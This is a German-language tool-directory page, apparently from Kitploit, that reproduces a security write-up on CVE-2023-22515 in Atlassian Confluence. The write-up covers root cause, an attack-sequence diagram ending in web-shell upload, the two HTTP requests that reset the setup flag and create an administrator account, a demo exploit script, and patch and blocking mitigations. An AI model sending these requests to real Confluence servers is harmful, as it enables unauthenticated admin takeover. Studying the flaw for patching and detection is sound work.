Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2023-22515-1 — Technische Analyse und Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle in Atlassian Confluence, die die Erstellung von Admin-Konten ohne Authentifizierung und die Kompromittierung des Systems ermöglicht. | Kitploit
Tools/GitHubGitHub/dkq-k/cve-2023-22515-1
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubdkq-k/cve-2023-22515-1

cve-2023-22515-1

Technische Analyse und Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle in Atlassian Confluence, die die Erstellung von Admin-Konten ohne Authentifizierung und die Kompromittierung des Systems ermöglicht.

Repository anzeigen
6vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2023-22515: Tiefenanalyse der Confluence-Rechteausweitungsschwachstelle

[!IMPORTANT] Dringende Sicherheitswarnung: Diese Schwachstelle hat einen CVSS-Score von 10.0 (Critical) und ist damit eine Schwachstelle mit höchstem Risiko. Wenn Sie eine betroffene Version verwenden, ist ein sofortiger Patch erforderlich.

1. Überblick (Overview)

CVE-2023-22515 ist eine kritische Broken Access Control-Schwachstelle, die in Atlassian Confluence Data Center und Server entdeckt wurde. Angreifer können den Konfigurationsstatus des Servers ohne Authentifizierung remote manipulieren, Administrator-Konten erstellen und das System vollständig übernehmen.

KategorieDetails
Schwachstellen-IDCVE-2023-22515
RisikostufeCRITICAL (CVSS 10.0)
Betroffene Versionen8.0.0 ~ 8.5.1 (genaue Versionen müssen überprüft werden)
AngriffsartAuthentifizierungsumgehung und Rechteausweitung

2. Angriffsmechanismus (Attack Mechanism)

Diese Schwachstelle wird ausgelöst, indem ein Angreifer über den Endpunkt /server-info.action den Wert bootstrapStatusProvider.applicationConfig.setupComplete auf false ändert.

🔍 Diagramm der Angriffssequenz

sequenceDiagram
    participant Attacker as 😈 공격자
    participant Server as 🖥️ Confluence 서버
    participant Config as ⚙️ 설정 관리자

    Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
    Attacker->>Server: GET /server-info.action?setupComplete=false
    Server->>Config: 메모리 상의 설정 완료 플래그 해제
    Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
    Server-->>Attacker: HTTP 200/302 OK

    Note over Attacker, Server: 2단계: 관리자 계정 생성
    Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
    Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
    Server-->>Attacker: 계정 생성 성공 및 로그인

    Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
    Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
    Server-->>Attacker: 원격 명령 실행 권한 획득

[!NOTE] Kernprinzip: Statt die persistente Konfigurationsdatei (confluence.cfg.xml) zu verändern, wird der Laufzeitzustand im Speicher geändert, um die Zugriffskontrolllogik zu umgehen.

3. Detaillierte Analyse (Technical Analysis)

Ursache (Root Cause)

Die Ursache liegt in einer Schwachstelle in der Parameterbindung des XWork2-Frameworks sowie in der fehlenden Validierung externer Eingaben für die sensible Eigenschaft (setupComplete) in der Action-Klasse (ServerInfoAction) von Confluence.

Beispiel einer HTTP-Anfrage

Ein Angreifer kann den Server bereits mit einer einfachen HTTP-Anfrage lahmlegen.

1. Anfrage zum Zurücksetzen der Konfiguration:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com

2. Anfrage zur Erstellung eines Administrator-Kontos:

POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...

4. Reproduktion der Schwachstelle (PoC & Demo)

Mit dem zusammen mit diesem Bericht bereitgestellten Reproduktions-Kit (cve-2023-22515-repro) kann die Schwachstelle in einer sicheren Docker-Umgebung praktisch nachvollzogen werden.

🎥 Filmische Demo

Es ist ein Demo-Skript enthalten, mit dem der tatsächliche Hacking-Prozess im Terminal visuell verfolgt werden kann.

# 데모 실행 명령어
bash cinematic_pwn.sh

[!TIP] Das Demo-Skript führt einen Angriff gegen einen realen Server (localhost:8090) durch und zeigt automatisiert den gesamten Ablauf: Es erstellt das Administrator-Konto und versucht anschließend die Anmeldung.

5. Gegenmaßnahmen (Mitigation)

✅ Aktuellen Patch anwenden (empfohlen)

Die zuverlässigste Lösung ist ein Upgrade auf die von Atlassian bereitgestellten, korrigierten Versionen.

  • 8.3.3 oder höher
  • 8.4.3 oder höher
  • 8.5.2 oder höher

⚠️ Vorübergehende Abhilfemaßnahmen

Falls ein Patch nicht möglich ist, blockieren Sie in Netzwerk-Sicherheitsgeräten (WAF, Load Balancer usw.) den Zugriff auf die folgenden URL-Muster.

  • */setup/*

6. Fazit (Conclusion)

CVE-2023-22515 ist eine kritische Schwachstelle: Sie ist sehr einfach auszunutzen und ermöglicht zugleich die vollständige Übernahme des Systems. Sicherheitsverantwortliche sollten umgehend Patches einspielen und die Systeme auf Anzeichen einer Kompromittierung überwachen.


Erstellt am: 2026-01-16 | Autor: Antigravity Security Analysis Team

Tool herunterladen